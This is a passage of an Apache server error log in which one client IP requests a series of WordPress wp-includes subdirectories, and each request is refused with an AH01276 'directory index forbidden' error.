(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:59.191172 2024] [autoindex:error] [pid 2165:tid 140339926984448] [client 193.34.213.138:43504] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/gallery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:04.425422 2024] [autoindex:error] [pid 2165:tid 140340036089600] [client 193.34.213.138:43512] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/group/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:18.844512 2024] [autoindex:error] [pid 2007:tid 140340044482304] [client 193.34.213.138:43524] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/heading/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:33.170829 2024] [autoindex:error] [pid 2165:tid 140340156188416] [client 193.34.213.138:43542] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/html/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:40.482225 2024] [autoindex:error] [pid 2165:tid 140340164581120] [client 193.34.213.138:43550] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:44.132339 2024] [autoindex:error] [pid 2165:tid 140340147795712] [client 193.34.213.138:43554] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-comments/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:51.340681 2024] [autoindex:error] [pid 2165:tid 140340010911488] [client 193.34.213.138:43558] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-posts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:24:57.338113 2024] [autoindex:error] [pid 2165:tid 140339952162560] [client 193.34.213.138:43570] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/legacy-widget/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:05.425351 2024] [autoindex:error] [pid 2165:tid 140339977340672] [client 193.34.213.138:43598] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/list/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:11.659296 2024] [autoindex:error] [pid 2165:tid 140340052875008] [client 193.34.213.138:43616] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/loginout/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:23.206029 2024] [autoindex:error] [pid 2006:tid 140340052875008] [client 193.34.213.138:43624] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/media-text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:26.254879 2024] [autoindex:error] [pid 2008:tid 140340044482304] [client 193.34.213.138:43628] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/missing/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:31.161512 2024] [autoindex:error] [pid 2008:tid 140340156188416] [client 193.34.213.138:43632] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/more/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:39.590351 2024] [autoindex:error] [pid 2165:tid 140340198151936] [client 193.34.213.138:43640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/nextpage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:46.609733 2024] [autoindex:error] [pid 2165:tid 140340027696896] [client 193.34.213.138:43644] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/page-list/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:53.990701 2024] [autoindex:error] [pid 2006:tid 140340027696896] [client 193.34.213.138:43652] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:25:58.868747 2024] [autoindex:error] [pid 2006:tid 140339994126080] [client 193.34.213.138:43660] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:01.195461 2024] [autoindex:error] [pid 2007:tid 140340010911488] [client 193.34.213.138:43664] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-date/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:10.738313 2024] [autoindex:error] [pid 2007:tid 140339968947968] [client 193.34.213.138:43672] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-excerpt/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:16.261527 2024] [autoindex:error] [pid 2007:tid 140339926984448] [client 193.34.213.138:43690] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-featured-image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:20.817756 2024] [autoindex:error] [pid 2007:tid 140339960555264] [client 193.34.213.138:43696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-template/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:29.425858 2024] [autoindex:error] [pid 2007:tid 140340172973824] [client 193.34.213.138:43700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-terms/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:36.570552 2024] [autoindex:error] [pid 2007:tid 140340069660416] [client 193.34.213.138:43708] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:41.442789 2024] [autoindex:error] [pid 2006:tid 140339943769856] [client 193.34.213.138:43712] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/preformatted/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:45.585692 2024] [autoindex:error] [pid 2165:tid 140339968947968] [client 193.34.213.138:43716] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:26:56.013277 2024] [autoindex:error] [pid 2006:tid 140340172973824] [client 193.34.213.138:43726] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-next/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:06.857841 2024] [autoindex:error] [pid 2008:tid 140339968947968] [client 193.34.213.138:43730] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-numbers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:09.007628 2024] [autoindex:error] [pid 2165:tid 140339935377152] [client 193.34.213.138:43734] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-previous/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:21.358704 2024] [autoindex:error] [pid 2165:tid 140339960555264] [client 193.34.213.138:43738] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:30.394169 2024] [autoindex:error] [pid 2007:tid 140340061267712] [client 193.34.213.138:43742] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:37.215977 2024] [autoindex:error] [pid 2165:tid 140340036089600] [client 193.34.213.138:43750] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:46.607135 2024] [autoindex:error] [pid 2008:tid 140339926984448] [client 193.34.213.138:43754] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/quote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:51.662126 2024] [autoindex:error] [pid 2006:tid 140340061267712] [client 193.34.213.138:43758] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/rss/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:27:55.427324 2024] [autoindex:error] [pid 2006:tid 140340019304192] [client 193.34.213.138:43766] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:03.645603 2024] [autoindex:error] [pid 2165:tid 140340172973824] [client 193.34.213.138:43782] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/separator/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:09.133636 2024] [autoindex:error] [pid 2006:tid 140339977340672] [client 193.34.213.138:43786] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/shortcode/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:12.845442 2024] [autoindex:error] [pid 2006:tid 140339960555264] [client 193.34.213.138:43790] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-logo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:27.700879 2024] [autoindex:error] [pid 2165:tid 140340147795712] [client 193.34.213.138:43796] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-tagline/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:36.910400 2024] [autoindex:error] [pid 2008:tid 140339960555264] [client 193.34.213.138:43804] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:49.826774 2024] [autoindex:error] [pid 2008:tid 140340069660416] [client 193.34.213.138:43808] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:54.117030 2024] [autoindex:error] [pid 2007:tid 140339926984448] [client 193.34.213.138:43816] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-links/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:28:56.533483 2024] [autoindex:error] [pid 2165:tid 140340010911488] [client 193.34.213.138:43820] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:00.119833 2024] [autoindex:error] [pid 2008:tid 140340181366528] [client 193.34.213.138:43824] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/table/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:07.939509 2024] [autoindex:error] [pid 2007:tid 140339943769856] [client 193.34.213.138:43828] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:12.782236 2024] [autoindex:error] [pid 2165:tid 140339968947968] [client 193.34.213.138:43832] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/text-columns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:32.641204 2024] [autoindex:error] [pid 2165:tid 140340019304192] [client 193.34.213.138:43844] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/verse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:35.348961 2024] [autoindex:error] [pid 2165:tid 140339960555264] [client 193.34.213.138:43848] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/video/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:38.166857 2024] [autoindex:error] [pid 2165:tid 140339926984448] [client 193.34.213.138:43856] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:41.612524 2024] [autoindex:error] [pid 2007:tid 140340172973824] [client 193.34.213.138:43860] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:50.028377 2024] [autoindex:error] [pid 2007:tid 140340069660416] [client 193.34.213.138:43864] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-directory/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:55.024075 2024] [autoindex:error] [pid 2165:tid 140340156188416] [client 193.34.213.138:43872] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:29:59.595795 2024] [autoindex:error] [pid 2008:tid 140340027696896] [client 193.34.213.138:43878] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/customize-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:05.982797 2024] [autoindex:error] [pid 2007:tid 140340147795712] [client 193.34.213.138:43882] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/list-reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:14.814738 2024] [autoindex:error] [pid 2006:tid 140340172973824] [client 193.34.213.138:43886] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/nux/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:22.472790 2024] [autoindex:error] [pid 2006:tid 140340069660416] [client 193.34.213.138:43892] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-post/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:29.267029 2024] [autoindex:error] [pid 2008:tid 140339943769856] [client 193.34.213.138:43906] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:32.881099 2024] [autoindex:error] [pid 2008:tid 140339977340672] [client 193.34.213.138:43916] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:30:36.889601 2024] [autoindex:error] [pid 2007:tid 140340044482304] [client 193.34.213.138:43926] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/format-library/: No matching DirectoryIndex 